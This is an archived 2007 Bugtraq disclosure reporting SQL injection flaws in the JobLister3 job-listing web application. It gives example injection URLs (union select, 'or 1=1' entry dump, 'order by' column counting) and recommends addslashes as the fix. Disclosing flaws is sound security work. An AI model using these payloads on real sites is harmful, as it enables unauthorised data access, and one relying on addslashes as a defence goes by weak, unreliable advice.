lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20070813062613.25517.qmail@securityfocus.com>
Date: 13 Aug 2007 06:26:13 -0000
From: joseph.giron13@...il.com
To: bugtraq@...urityfocus.com
Subject: JobLister3 SQL injection vulnerabilities


JobLister3 by SkilMatch Staffing Systems, Inc.
Multiple SQL injection vulnerabilities

http://www.dubdubdub.com/

http://www.skilmatch.com/

The search form filed doesnt strip special characters that have special 

meanings. A single quote makes the application spit out a number of 

errors. 

This is not limited to the search query. The GET'd variables also fail to 

sanatize characters. 
Union selection:
www.example.com/index.php?mode=showbyID&jobid=99786'%20union%20all%20sele

ct%20something%20from%20something/*

Dump of entries:
www.example.com/index.php?mode=showbyID&jobid=99786'%20or%201=1/*

Using some old fasioned order by work, wee deduce 16 columns
www.example.com/index.php?mode=showbyID&jobid=99786'%20order%20by%2016/*

Thus, the fix currently would be to impletement addslashes functions to 

all areas that recieve (or can recieve) user supplied data. 

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ